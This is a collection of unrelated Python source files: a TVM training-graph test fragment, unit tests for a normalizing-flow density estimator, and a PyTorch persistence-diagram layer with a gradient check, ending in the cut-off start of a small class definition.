for b in range(0, batch):
random_onehot_label.append(random.randint(0, num_classes-1))
label_np_torch = torch.tensor(random_onehot_label)
label_np = np.eye(num_classes)[random_onehot_label].astype(dtype)
print("random_onehot_label", random_onehot_label)
print("label_np_torch", label_np_torch)
print("lable_np", label_np)
margin_loss = MarginLoss(label_tensor)
sgd = SGD(1)
fwd_graph = ForwardGraph([img_tensor], [output_tensor], weights_tensors)
# #change data layout
# forward_space = ForwardGraphSpace()
# forward_tuner = RandomForwardTuner(forward_space)
# layout_generator = LayoutTransform(fwd_graph, forward_space, forward_tuner)
# fgraph = layout_generator.generate()
fgraph = fwd_graph
# autodiff
bgraph = fgraph.make_backward(margin_loss, sgd)
sch, bufs = bgraph.create_schedule()
# print(tvm.lower(sch, bufs, simple_mode=True))
target = "llvm"
dev = 0
naive_func = bgraph.build(sch, bufs, target)
# make tir graph
inputs = [x.tvm_tensor for x in bgraph.inputs]
weights = [x.tvm_tensor for x in bgraph.weights]
outputs = [x.tvm_tensor for x in bgraph.outputs]
labels = [x.tvm_tensor for x in bgraph.labels]
loss = bgraph.loss.tvm_tensor
gradients = [x.tvm_tensor for x in bgraph.gradients]
updates = [x.tvm_tensor for x in bgraph.updates]
# labels = []
# loss = None
# gradients = []
# updates = []
tgraph = PyTIRGraph(
[x.tvm_tensor for x in bgraph.inputs],
[x.tvm_tensor for x in bgraph.labels],
[x.tvm_tensor for x in bgraph.outputs],
[x.tvm_tensor for x in bgraph.weights],
bgraph.loss.tvm_tensor,
[x.tvm_tensor for x in bgraph.gradients],
bgraph.lr.tvm_tensor,
[x.tvm_tensor for x in bgraph.updates])
print("after tir graph")
# apply config
# 1. modify op stat list -> head, tail
# 2. make subgraphs
tgraph.partition_graph()
# 3. create schedule
tgraph.create_schedule()
# 4. modify schedule
tgraph.build(target)
# allocate buffer
# only the first call has effect
lr_np = sgd.get_lr().astype("float32")
tgraph.set_inputs({bgraph.inputs[0].tvm_tensor: img_np})
tgraph.set_labels({bgraph.labels[0].tvm_tensor: label_np})
tgraph.set_lr(lr_np)
tgraph.allocate_buffer(target, dev)
ctx = tvm.context(target, dev)
# copy the data (do not use reference)
A_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.inputs[0].tvm_tensor).asnumpy(), ctx)
label_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.labels[0].tvm_tensor).asnumpy(), ctx)
weights_tvm = [tvm.nd.array(tgraph.get_tvm_array(x.tvm_tensor).asnumpy(), ctx) for x in bgraph.weights]
# B_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.weights[0].tvm_tensor).asnumpy(), ctx)
# bias_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.weights[1].tvm_tensor).asnumpy(), ctx)
# E_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.weights[2].tvm_tensor).asnumpy(), ctx)
lr_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.lr.tvm_tensor).asnumpy(), ctx)
updates_tvm = [tvm.nd.array(x.asnumpy(), ctx) for x in tgraph.get_updates()]
naive_func(A_tvm, label_tvm, *weights_tvm, lr_tvm, *updates_tvm)
print("naive_func successful!")
# # subgraph partition
# partition_space = PartitionSpace()
# partition_tuner = RandomPartitionTuner(partition_space)
# cut_candidates = form_cut_candidates(tgraph)
# # print(cut_candidates)
# for i, candidate in enumerate(cut_candidates):
# name = "graph_cut_" + str(i)
# partition_generator = SingleCut(tgraph, name, candidate, partition_space, partition_tuner)
# partition_generator.generate()
# # for op, stat in tgraph.op_stat_dict.items():
# # print(op, " head=", stat.head)
# tgraph.partition_graph()
print("num subgraphs:", len(tgraph.subgraphs))
np_weight = []
for item in tgraph.get_updates():
np_weight.append(item.asnumpy())
# print("------------BEFORE FUNC----------------")
# print("Checking loss!")
# print(tgraph.get_loss(0).asnumpy())
# print("Checking Gradients!")
# for item in tgraph.get_gradients():
# print(item.asnumpy())
# print("checking weight")
# for item in tgraph.get_updates():
# print(item.asnumpy())
# print("------------------------------")
for mark in tgraph.call_order:
print("enter once")
func = tgraph.functions[mark]
bufs = tgraph.bufs[mark]
print("bufs", bufs)
print("--------")
print("tgraph.subgraphs[mark].index:", tgraph.subgraphs[mark].index)
print("----------")
print("tgraph.subgraphs[mark].index.keys():", tgraph.subgraphs[mark].index.keys())
real_bufs = [tgraph.tvm_array_dict[tgraph.subgraphs[mark].index[x]] for x in bufs]
print("I am here before func")
func(*real_bufs)
#print("I am here after func")
print("------------AFTER FUNC----------------")
print("Checking loss!")
print(tgraph.get_loss(0).asnumpy())
print("Checking Gradients!")
for item in tgraph.get_gradients():
print(item.asnumpy())
if __name__ == "__main__":
test1()
test2()
|
11520191
|
import unittest
from scipy.stats import norm
import warnings
import pickle
import tensorflow as tf
import sys
import os
import numpy as np
import scipy.stats as stats
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from cde.density_estimator import NormalizingFlowEstimator
from cde.density_estimator.normalizing_flows import InvertedPlanarFlow, AffineFlow, IdentityFlow, InvertedRadialFlow
class TestFlows(unittest.TestCase):
def test_planar_invertibel(self):
with tf.Session() as sess:
u = tf.constant([[-2.], [1.], [10.], [2.]])
w = tf.constant([[80.], [-1.], [1.], [1.]])
# Compute w * û
inv = sess.run(w * InvertedPlanarFlow._u_circ(u, w))
for i in inv:
self.assertGreater(i, -1.)
def test_affine_shift_and_scale(self):
with tf.Session() as sess:
base_dist = tf.distributions.Normal(loc=0., scale=1.)
# shift the distribution three to the right
transf_dist = tf.distributions.Normal(loc=3., scale=1.)
flow = AffineFlow(tf.constant([[0., 3.]]), 1)
flow_dist = tf.contrib.distributions.TransformedDistribution(distribution=base_dist, bijector=flow)
# eval the samples so they stay constant
samples = sess.run(base_dist.sample([1000]))
# the output is of shape (?, 1) so it needs to be squeezed
pdf_estimate = tf.squeeze(flow_dist.prob(samples))
pdf_actual = transf_dist.prob(samples)
pdf_estimate, pdf_actual = sess.run([pdf_estimate, pdf_actual])
self.assertLessEqual(np.mean(np.abs(pdf_actual - pdf_estimate)), 0.1)
def _test_flow_correct_dims_NN(self, flow_name):
"""
General structure:
flow_params = MLP(x)
pdf(y|x) = flow(y, flow_params)
The tensor being transformed (=y) are of shape (batch_size, event_dims)
- batch_size = len(x) == len(y)
- event_dims = rank(y)
For each element of x, the MLP outputs one parametrization for the flows
for each of these parameters, the flow transforms one element of y
therefore len(x) == len(y)
the event dimension describes the rank of the base probability distribution that's being transformed
Tensorflow's MultivariateNormal doesn't implement a CDF. Therefore we switch to a Normal for 1-D Problems
Caveat:
MultivariateNormal PDF output shape: (batch_size, )
UnivariateNormal PDF output shape: (batch_size, 1)
Therefore we adapt the output shape of the ildj to be (batch_size, 1) for 1-D, (batch_size, ) for N-D
The flows are transforming tensors (batch_size, event_size)
Forward: (batch_size, event_size) -> (batch_size, event_size)
Inverse: (batch_size, event_size) -> (batch_size, event_size)
ILDJ: (batch_size, event_size) -> (batch_size, 1) [1-D] or (batch_size, ) [N-D]
This forms a transformed distribution:
Sample: -> (batch_size, event_size)
PDF: (batch_size, event_size) -> (batch_size, 1) [1-D] or (batch_size, ) [N-D]
CDF: (batch_size, event_size) -> (batch_size, 1) [EXISTS ONLY FOR 1-D!]
"""
tests = [
{
'x': [[1.], [0.], [2.], [4.], [1.]],
'y': [[1.], [0.], [2.], [3.], [1.]],
'ndim_x': 1,
'ndim_y': 1
},
{
'x': [[1., 1.], [0., 0.], [2., 2.], [4., 4.], [1., 1.]],
'y': [[1., 1.], [0., 0.], [2., 2.], [3., 3.], [1., 1.]],
'ndim_x': 2,
'ndim_y': 2
}
]
with tf.Session() as sess:
for test in tests:
model = NormalizingFlowEstimator('nf_dimtest_' + flow_name + str(tests.index(test)),
test['ndim_x'], test['ndim_y'],
random_seed=22, n_training_epochs=2,
flows_type=(flow_name,))
x, y = np.array(test['x']), np.array(test['y'])
model.fit(x, y)
p = model.pdf(x, y)
self.assertEqual(p.shape, (len(y),))
# every test has equal first and last elements, theses are basic sanity tests
self.assertAlmostEqual(p[0], p[-1], places=5)
self.assertNotAlmostEqual(p[0], p[1], places=5)
def _test_flow_correct_dims(self, flow_class):
tests = [
([[1.], [2.], [1.]], 1),
([[1., 1.], [2., 2.], [1., 1.]], 2),
]
with tf.Session() as sess:
for test in tests:
y, event_dims = test
batch_size = len(y)
y = np.array(y, dtype=np.float32)
if event_dims == 1:
base_dist = tf.distributions.Normal(loc=0., scale=1.)
else:
base_dist = tf.contrib.distributions.MultivariateNormalDiag(loc=[0.] * event_dims,
scale_diag=[1.] * event_dims)
params = tf.ones(shape=(batch_size, flow_class.get_param_size(event_dims)))
flow = flow_class(params, event_dims)
flow_dist = tf.contrib.distributions.TransformedDistribution(distribution=base_dist, bijector=flow)
# reverse should transform (batch_size, event_dims) -> (batch_size, event_dims)
self.assertEqual(y.shape, (batch_size, event_dims))
inverse_y = flow.inverse(y).eval()
self.assertEqual(inverse_y.shape, (batch_size, event_dims))
# ildj is a reduction over event_dims
# therefore transforms: (batch_size, event_dims) -> (batch_size, 1)
self.assertEqual(y.shape, (batch_size, event_dims))
ildj_y = flow.inverse_log_det_jacobian(y).eval()
if event_dims == 1:
self.assertEqual(ildj_y.shape, (batch_size, 1))
else:
self.assertEqual(ildj_y.shape, (batch_size,))
# probability: (batch_size, event_dims) -> (batch_size, 1)
self.assertEqual(y.shape, (batch_size, event_dims))
p = flow_dist.prob(y).eval()
if event_dims == 1:
self.assertEqual(p.shape, (batch_size, 1))
else:
self.assertEqual(p.shape, (batch_size,))
# the first an same element of every test is the same, this is a basic sanity test
self.assertEqual(p[0], p[2])
self.assertNotEqual(p[0], p[1])
def test_affine_flow_correct_dimension(self):
self._test_flow_correct_dims(AffineFlow)
self._test_flow_correct_dims_NN('affine')
def test_identity_flow_correct_dimension(self):
self._test_flow_correct_dims(IdentityFlow)
# we don't test NN dimensions for the Identity flow as it contains no trainable variables
def test_planar_flow_correct_dimension(self):
self._test_flow_correct_dims(InvertedPlanarFlow)
self._test_flow_correct_dims_NN('planar')
def test_radial_flow_correct_dimension(self):
self._test_flow_correct_dims(InvertedRadialFlow)
self._test_flow_correct_dims_NN('radial')
class Test_NF_2d_gaussian(unittest.TestCase):
def get_samples(self, mu=2, std=1.0):
np.random.seed(22)
data = np.random.normal([mu, mu], std, size=(2000, 2))
X = data[:, 0]
Y = data[:, 1]
return X, Y
def test_NF_radial_with_2d_gaussian(self):
mu = 200
std = 23
X, Y = self.get_samples(mu=mu, std=std)
model = NormalizingFlowEstimator("nf_estimator_2d_radial", 1, 1, flows_type=('radial',),
n_training_epochs=500, random_seed=22)
model.fit(X, Y)
y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
x = np.asarray([mu for i in range(y.shape[0])])
p_est = model.pdf(x, y)
p_true = norm.pdf(y, loc=mu, scale=std)
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
def test_NF_affine_with_2d_gaussian(self):
mu = 3
std = 2
X, Y = self.get_samples(mu=mu, std=std)
model = NormalizingFlowEstimator("nf_estimator_2d_affine", 1, 1, flows_type=('affine',),
n_training_epochs=500, random_seed=22)
model.fit(X, Y)
y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
x = np.asarray([mu for i in range(y.shape[0])])
p_est = model.pdf(x, y)
p_true = norm.pdf(y, loc=mu, scale=std)
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
def test_NF_planar_with_2d_gaussian(self):
mu = 200
std = 23
X, Y = self.get_samples(mu=mu, std=std)
model = NormalizingFlowEstimator("nf_estimator_2d_planar", 1, 1, flows_type=('planar',),
n_training_epochs=500, random_seed=22)
model.fit(X, Y)
y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
x = np.asarray([mu for i in range(y.shape[0])])
p_est = model.pdf(x, y)
p_true = norm.pdf(y, loc=mu, scale=std)
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
def test_NF_identitiy_with_2d_gaussian(self):
mu = 200
std = 23
X, Y = self.get_samples(mu=mu, std=std)
model1 = NormalizingFlowEstimator("nf_estimator_2d_planar_no_id", 1, 1, flows_type=('planar',),
n_training_epochs=50, random_seed=22)
model2 = NormalizingFlowEstimator("nf_estimator_2d_planar_id", 1, 1, flows_type=('planar', 'identity'),
n_training_epochs=50, random_seed=22)
model1.fit(X, Y)
model2.fit(X, Y)
y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
x = np.asarray([mu for i in range(y.shape[0])])
p = model1.pdf(x, y)
p_id = model2.pdf(x, y)
self.assertLessEqual(np.mean(np.abs(p - p_id)), 0.01)
def test_NF_chain_with_2d_gaussian(self):
mu = 200
std = 23
X, Y = self.get_samples(mu=mu, std=std)
model = NormalizingFlowEstimator("nf_estimator_2d_chain", 1, 1, flows_type=('planar', 'radial'),
n_training_epochs=500, random_seed=22)
model.fit(X, Y)
y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
x = np.asarray([mu for i in range(y.shape[0])])
p_est = model.pdf(x, y)
p_true = norm.pdf(y, loc=mu, scale=std)
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
def test_NF_radial_with_2d_gaussian2(self):
mu = -5
std = 2.5
X, Y = self.get_samples(mu=mu, std=std)
model = NormalizingFlowEstimator("nf_estimator_2d_radial_2", 1, 1, flows_type=('radial',),
n_training_epochs=500, random_seed=22)
model.fit(X, Y)
y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
x = np.asarray([mu for i in range(y.shape[0])])
p_est = model.pdf(x, y)
p_true = norm.pdf(y, loc=mu, scale=std)
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
def test_NF_chain_with_2d_gaussian2(self):
mu = -5
std = 2.5
X, Y = self.get_samples(mu=mu, std=std)
model = NormalizingFlowEstimator("nf_estimator_2d_chain_2", 1, 1, flows_type=('affine', 'planar', 'planar'),
n_training_epochs=1000, random_seed=22)
model.fit(X, Y)
y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
x = np.asarray([mu for i in range(y.shape[0])])
p_est = model.pdf(x, y)
p_true = norm.pdf(y, loc=mu, scale=std)
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
def test_NF_chain2_with_2d_gaussian2(self):
mu = -5
std = 2.5
X, Y = self.get_samples(mu=mu, std=std)
model = NormalizingFlowEstimator("nf_estimator_2d_chain2_2", 1, 1, flows_type=('radial', 'planar', 'radial'),
n_training_epochs=500, random_seed=22)
model.fit(X, Y)
y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
x = np.asarray([mu for i in range(y.shape[0])])
p_est = model.pdf(x, y)
p_true = norm.pdf(y, loc=mu, scale=std)
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
class TestMultiModal(unittest.TestCase):
"""
This tests whether the flows can model multimodal distributions
The distributions used aren't actually conditional distributions
"""
def test_bi_modal_planar_chain(self):
with tf.Session() as sess:
bimix_gauss = tf.contrib.distributions.Mixture(
cat=tf.distributions.Categorical(probs=[0.5, 0.5]),
components=[
tf.distributions.Normal(loc=-.4, scale=0.4),
tf.distributions.Normal(loc=+.4, scale=0.4),
])
x = tf.distributions.Normal(loc=0., scale=1.).sample([5000])
y = bimix_gauss.sample([5000])
x, y = sess.run([x, y])
model = NormalizingFlowEstimator("nf_estimator_bimodal_planar", 1, 1,
flows_type=('affine', 'planar', 'planar', 'planar'),
n_training_epochs=1000, random_seed=22)
model.fit(x, y)
p_est = model.pdf(x, y)
p_true = sess.run(bimix_gauss.prob(y))
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
def test_bi_modal_mixed_chain(self):
with tf.Session() as sess:
bimix_gauss = tf.contrib.distributions.Mixture(
cat=tf.distributions.Categorical(probs=[0.5, 0.5]),
components=[
tf.distributions.Normal(loc=-.5, scale=0.4),
tf.distributions.Normal(loc=+.5, scale=0.4),
])
x = tf.distributions.Normal(loc=0., scale=1.).sample([5000])
y = bimix_gauss.sample([5000])
x, y = sess.run([x, y])
model = NormalizingFlowEstimator("nf_estimator_trimodal_chain", 1, 1,
flows_type=('affine', 'radial', 'radial', 'radial'),
n_training_epochs=1000, random_seed=22)
model.fit(x, y)
p_est = model.pdf(x, y)
p_true = sess.run(bimix_gauss.prob(y))
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
def test_tri_modal_radial_chain(self):
with tf.Session() as sess:
bimix_gauss = tf.contrib.distributions.Mixture(
cat=tf.distributions.Categorical(probs=[0.3, 0.4, 0.3]),
components=[
tf.distributions.Normal(loc=-1., scale=0.4),
tf.distributions.Normal(loc=0., scale=0.4),
tf.distributions.Normal(loc=+1., scale=0.4),
])
x = np.ones(5000)
y = sess.run(bimix_gauss.sample([5000]))
model = NormalizingFlowEstimator("nf_estimator_bimodal_radial", 1, 1,
flows_type=('radial', 'radial', 'radial'),
n_training_epochs=1000, random_seed=22)
model.fit(x, y)
p_est = model.pdf(x, y)
p_true = sess.run(bimix_gauss.prob(y))
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
class TestLogProbability(unittest.TestCase):
def test_NF_log_pdf(self):
X, Y = np.random.normal(size=(1000, 3)), np.random.normal(size=(1000, 3))
with tf.Session() as sess:
model = NormalizingFlowEstimator("nf_logprob", 3, 3, flows_type=('affine', 'planar'),
n_training_epochs=10, random_seed=22)
model.fit(X, Y)
x, y = np.random.normal(size=(1000, 3)), np.random.normal(size=(1000, 3))
prob = model.pdf(x, y)
log_prob = model.log_pdf(x, y)
self.assertLessEqual(np.mean(np.abs(prob - np.exp(log_prob))), 0.001)
class TestRegularization(unittest.TestCase):
def get_samples(self, std=1.0, mean=2):
np.random.seed(22)
data = np.random.normal([mean, mean], std, size=(2000, 2))
X = data[:, 0]
Y = data[:, 1]
return X, Y
def test_data_normalization(self):
X, Y = self.get_samples(std=2, mean=20)
with tf.Session() as sess:
model = NormalizingFlowEstimator("nf_data_normalization", 1, 1, flows_type=('affine', 'radial', 'radial'),
x_noise_std=None, y_noise_std=None, data_normalization=True,
n_training_epochs=100)
model.fit(X, Y)
# test if data statistics were properly assigned to tf graph
x_mean, x_std = model.sess.run([model.mean_x_sym, model.std_x_sym])
print(x_mean, x_std)
mean_diff = float(np.abs(x_mean - 20))
std_diff = float(np.abs(x_std - 2))
self.assertLessEqual(mean_diff, 0.5)
self.assertLessEqual(std_diff, 0.5)
def test_bi_modal_radial_chain_w_gaussian_noise(self):
with tf.Session() as sess:
bimix_gauss = tf.contrib.distributions.Mixture(
cat=tf.distributions.Categorical(probs=[0.5, 0.5]),
components=[
tf.distributions.Normal(loc=-1., scale=0.5),
tf.distributions.Normal(loc=+1., scale=0.5),
])
x = np.ones(5000)
y = sess.run(bimix_gauss.sample([5000]))
model = NormalizingFlowEstimator("nf_estimator_bimodal_radial_gaussian", 1, 1,
flows_type=('radial', 'radial', 'radial'),
data_normalization=True, x_noise_std=0.1, y_noise_std=0.1,
n_training_epochs=1000, random_seed=22)
model.fit(x, y)
p_est = model.pdf(x, y)
p_true = sess.run(bimix_gauss.prob(y))
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
def test_weight_decay(self):
with tf.Session() as sess:
bimix_gauss = tf.contrib.distributions.Mixture(
cat=tf.distributions.Categorical(probs=[0.5, 0.5]),
components=[
tf.distributions.Normal(loc=-1., scale=0.5),
tf.distributions.Normal(loc=+1., scale=0.5),
])
x = np.ones(5000)
y = sess.run(bimix_gauss.sample([5000]))
model = NormalizingFlowEstimator("nf_estimator_weight_decay", 1, 1,
flows_type=('affine', 'radial', 'radial'),
data_normalization=True, weight_decay=0.0001, n_training_epochs=1000,
random_seed=22)
model.fit(x, y)
p_est = model.pdf(x, y)
p_true = sess.run(bimix_gauss.prob(y))
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.01)
def test_dropout(self):
with tf.Session() as sess:
bimix_gauss = tf.contrib.distributions.Mixture(
cat=tf.distributions.Categorical(probs=[0.5, 0.5]),
components=[
tf.distributions.Normal(loc=-1., scale=0.5),
tf.distributions.Normal(loc=+1., scale=0.5),
])
x = np.ones(5000)
y = sess.run(bimix_gauss.sample([5000]))
dropout_model = NormalizingFlowEstimator("nf_dropout_reasonable", 1, 1,
flows_type=('affine', 'radial', 'radial'),
data_normalization=True, dropout=0.5, random_seed=22)
full_dropout = NormalizingFlowEstimator("nf_dropout_full", 1, 1,
flows_type=('affine', 'radial', 'radial'),
data_normalization=True, dropout=0.85, random_seed=22)
dropout_model.fit(x, y)
full_dropout.fit(x, y)
p_est = dropout_model.pdf(x, y)
p_est_trash = full_dropout.pdf(x, y)
p_true = sess.run(bimix_gauss.prob(y))
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.02)
self.assertGreater(np.mean(np.abs(p_true - p_est_trash)), 0.02)
class TestSerialization(unittest.TestCase):
def get_samples(self, std=1.0):
np.random.seed(22)
data = np.random.normal([2, 2, 2, 2], std, size=(2000, 4))
X = data[:, 0:2]
Y = data[:, 2:4]
return X, Y
def test_pickle_unpickle_NF_estimator(self):
X, Y = self.get_samples()
with tf.Session() as sess:
model = NormalizingFlowEstimator('nf_pickle', 2, 2, ('affine', 'radial', 'radial'),
data_normalization=True, random_seed=22, n_training_epochs=10)
model.fit(X, Y)
pdf_before = model.pdf(X, Y)
dump_string = pickle.dumps(model)
tf.reset_default_graph()
with tf.Session() as sess:
model_loaded = pickle.loads(dump_string)
pdf_after = model_loaded.pdf(X, Y)
diff = np.sum(np.abs(pdf_after - pdf_before))
self.assertAlmostEqual(diff, 0, places=2)
class TestFitByCrossval(unittest.TestCase):
def get_samples(self, std=1.0, mean=2):
np.random.seed(22)
data = np.random.normal([mean, mean], std, size=(2000, 2))
X = data[:, 0]
Y = data[:, 1]
return X, Y
def test_NF_fit_by_crossval(self):
X, Y = self.get_samples(std=1., mean=-4)
param_grid = {
'n_training_epochs': [0, 500],
'data_normalization': [False]
}
model = NormalizingFlowEstimator('nf_crossval', 1, 1)
model.fit_by_cv(X, Y, param_grid=param_grid)
y = np.arange(-1, 5, 0.5)
x = np.asarray([2 for _ in range(y.shape[0])])
p_est = model.pdf(x, y)
p_true = norm.pdf(y, loc=2, scale=1)
self.assertEqual(model.get_params()["n_training_epochs"], 500)
self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.2)
if __name__ == '__main__':
warnings.filterwarnings("ignore")
testmodules = [
'unittests_normalizing_flows.Test_NF_2d_gaussian',
'unittests_normalizing_flows.TestLogProbability',
'unittests_normalizing_flows.TestFlows',
# 'unittests_normalizing_flows.TestMultiModal',
'unittests_normalizing_flows.TestRegularization',
'unittests_normalizing_flows.TestSerialization',
# 'unittests_normalizing_flows.TestFitByCrossval',
]
suite = unittest.TestSuite()
for t in testmodules:
try:
# If the module defines a suite() function, call it to get the suite.
mod = __import__(t, globals(), locals(), ['suite'])
suitefn = getattr(mod, 'suite')
suite.addTest(suitefn())
except (ImportError, AttributeError):
# else, just load all the test cases from the module.
suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))
unittest.TextTestRunner().run(suite)
|
11520197
|
from __future__ import print_function
import numpy as np
# import sys
# sys.path.append('../Python')
from ..util.flag_dionysus import computePersistence
import dionysus as d
import time
import torch
from torch.autograd import Variable, Function
dtype=torch.float32 # torch.double #torch.float32
PLOT = True
''' OBS: -1.0 are used as a token value for dgm values and indicies!!!!!! '''
class Diagramlayer(Function):
# Note that both forward and backward are @staticmethods
@staticmethod
# bias is an optional argument
def forward(ctx, x, saturation=None, maxdim=1, verbose=False):
MAX_DIMENSION = maxdim + 1 # maximal simplex dimension
if verbose: print("*** dgm start")
if saturation == None:
SATURATION_VALUE = 3.1
print("==== WARNING: NO SATURATION VALUE GIVEN, {}".format(SATURATION_VALUE))
else:
SATURATION_VALUE = saturation
start_time = time.time()
function_values = x
# list of function values on vertices, and maximal dimension it will return 0,1,2,3
function_useable = function_values.data.numpy()
''' 2 is max homology dimension '''
''' returns (sorted) filtration filled with the k-skeleton of the clique complex built on the points at distance at most r from each other '''
F = d.fill_rips(function_useable, MAX_DIMENSION, SATURATION_VALUE)
# F.sort() # this is done in computePersistence
dgms, Tbl = computePersistence(F)
max_pts = np.max([len(dgms[i]) for i in range(maxdim+1)])
num_dgm_pts = max_pts
''' -1 is used later '''
dgms_inds = -1 * np.ones([maxdim+1, num_dgm_pts, 4])
dgms_values = -np.inf * np.ones([maxdim+1, num_dgm_pts, 2]) # -1.0 * np.ones([3, num_dgm_pts, 2])
for dim in range(maxdim+1):
if len(dgms[dim]) > 0:
dgm = np.array(dgms[dim])
dgm[dgm == np.inf] = SATURATION_VALUE
l = np.min([num_dgm_pts, len(dgm)])
arg_sort = np.argsort(np.abs(dgm[:,1] - dgm[:,0]))[::-1]
dgms_inds[dim][:l] = dgm[arg_sort[:l], 2:6]
dgms_values[dim][:l] = dgm[arg_sort[:l], 0:2]
dgms_inds = dgms_inds.reshape([maxdim+1, num_dgm_pts, 2, 2])
#print dgms_values
#dgms_values[dgms_values == np.inf] = SATURATION_VALUE #-1.0, Won't show up as inifinite, but good enough
output = torch.tensor(dgms_values).type(dtype)
ctx.save_for_backward(x, torch.tensor(dgms_inds).type(dtype), output, torch.tensor(verbose))
if verbose: print("*** dgm done", time.time() - start_time)
return output
# This function has only a single output, so it gets only one gradient
@staticmethod
def backward(ctx, grad_output):
# This is a pattern that is very convenient - at the top of backward
# unpack saved_tensors and initialize all gradients w.r.t. inputs to
# None. Thanks to the fact that additional trailing Nones are
# ignored, the return statement is simple even when the function has
# optional inputs.
input, dgms_inds, dgms_values, verbose = ctx.saved_variables
if verbose: print("*** dgm back")
start_time = time.time()
points = input.data.numpy()
output = dgms_values.detach().numpy()
grad_input = torch.zeros(input.shape).type(dtype)
# MASK to only care about relevant spots later one
output[output == np.inf] = -np.inf # death_value infinite doesn't correspond to a simplex
output[output > -np.inf] = 1 # actual values that map to simplices
output[output == -np.inf] = 0 # float('NaN') # 0 # dont affect the gradient, since they dont exist, didn't have matches, just because we want to keep matrix structure
np_dgms_inds = dgms_inds.data.numpy().astype(np.int) # (3, 18424, 2, 2)
# print np_dgms_inds.shape # (3, 18424, 4)
list_of_unique_indices = np.unique(np_dgms_inds.flatten())
grad_intermediate = output * grad_output.detach().numpy() # Not necessary? (dgms, dgm_pts, 2)
''' will have incorrect mappings, but these will never be used? '''
pts_of_inds = points[np_dgms_inds]
#print "pts_of_inds", pts_of_inds.shape # (3, 50, 2, 2, 2)
for i in range(len(list_of_unique_indices)):
index = int(list_of_unique_indices[i]) # index into input, get all that responds to a point-index
''' Not mapped anyhwere, set above '''
if index > -1:
index_into_dgms_inds = np.argwhere(np_dgms_inds == index)
index_into_dgms_inds = index_into_dgms_inds.transpose()
index_into_dgms_inds_partners = np.copy(index_into_dgms_inds)
index_into_dgms_inds_partners[-1, :] = np.remainder(index_into_dgms_inds[-1, :] + 1, 2)
intermediate = pts_of_inds[list(index_into_dgms_inds)] - pts_of_inds[list(index_into_dgms_inds_partners)] #- dgms_inds_to_points[np.remainder(np.array(index_into_dgms_inds)+1, 2)]
''' No 1.0/2 factor for dionysus '''
#print("intermediate", intermediate)
''' Dividing by np.linalg.norm for zero norm has unintended consequences '''
norms = np.linalg.norm(intermediate, axis=1)
norms[norms == 0] = 1.0
intermediate = ( intermediate.transpose() / norms).transpose()
inds_into_grad_output = index_into_dgms_inds[:-1, :]
grad_output_and_intermediate = (intermediate.transpose() * grad_intermediate[ list(inds_into_grad_output) ]).transpose()
update = np.sum( grad_output_and_intermediate.reshape([-1, input.shape[1]]), axis=0 )
grad_input[int(index)] = torch.tensor(update).type(dtype)
if verbose: print("*** dgm back done", time.time() - start_time)
return grad_input, None, None, None
if __name__ == "__main__":
diagramlayer = Diagramlayer.apply
from torch.autograd import gradcheck
from utils_plot import plot_diagram2
from scipy.spatial import Delaunay
''' #### Generate initial points #### '''
import matplotlib.pyplot as plt
np.random.seed(0)
num_samples = 30 # 2048
# make a simple unit circle
theta = np.linspace(0, 2*np.pi, num_samples)
a, b = 1 * np.cos(theta), 1 * np.sin(theta)
# generate the points
theta = np.random.rand((num_samples)) * (2 * np.pi)
r = 1.0 # np.random.rand((num_samples))
x, y = r * np.cos(theta), r * np.sin(theta)
circle = np.array([x,y]).reshape([len(x), 2])
circle = (circle.T * (1.0 / np.linalg.norm(circle, axis=1))).T
#print circle
plt.figure()
plt.scatter(circle[:,0], circle[:,1])
plt.savefig('CIRCLE.png')
''' #### END #### '''
''' #### Rips #### '''
# f = d.fill_rips(circle, 2, 2.1)
# f.sort()
# gradchek takes a tuple of tensor as input, check if your gradient
# evaluated with these tensors are close enough to numerical
# approximations and returns True if they all verify this condition.
layer = Diagramlayer.apply
''' #### Test #### '''
weights = Variable(torch.tensor(circle).type(dtype), requires_grad=True)
# diagramlayer = Diagramlayer.apply
# dgms = diagramlayer(weights)
# dgms = dgms.detach().numpy()
# print dgms
# for d_i in range(dgms.shape[0]):
#
# dgmpts = dgms[d_i]
# print dgmpts.shape
# dgmpts = np.delete(dgmpts, np.where((dgmpts == (-np.inf, -np.inf)).all(axis=1)), axis=0)
# dgmpts0 = dgmpts
# if len(dgmpts) > 0:
# fig = plot_diagram2(dgmpts, 'Dimension {}'.format(0))
# else:
# fig = plt.figure()
# fig.savefig('dgm{}_{}.png'.format(d_i, "test"))
saturation = 1.1
input = (weights, saturation)
test = gradcheck(layer, input, eps=1e-4, atol=1e-3)
print(test)
|
11520260
|
import inflection
class NamedElement(object):
def __init__(self, **kwargs):
super(NamedElement, self).__init__()
self.name = kwargs.pop('name', "unnamed")
self.description = kwargs.pop('description', "")
def __getattribute__(self, name):
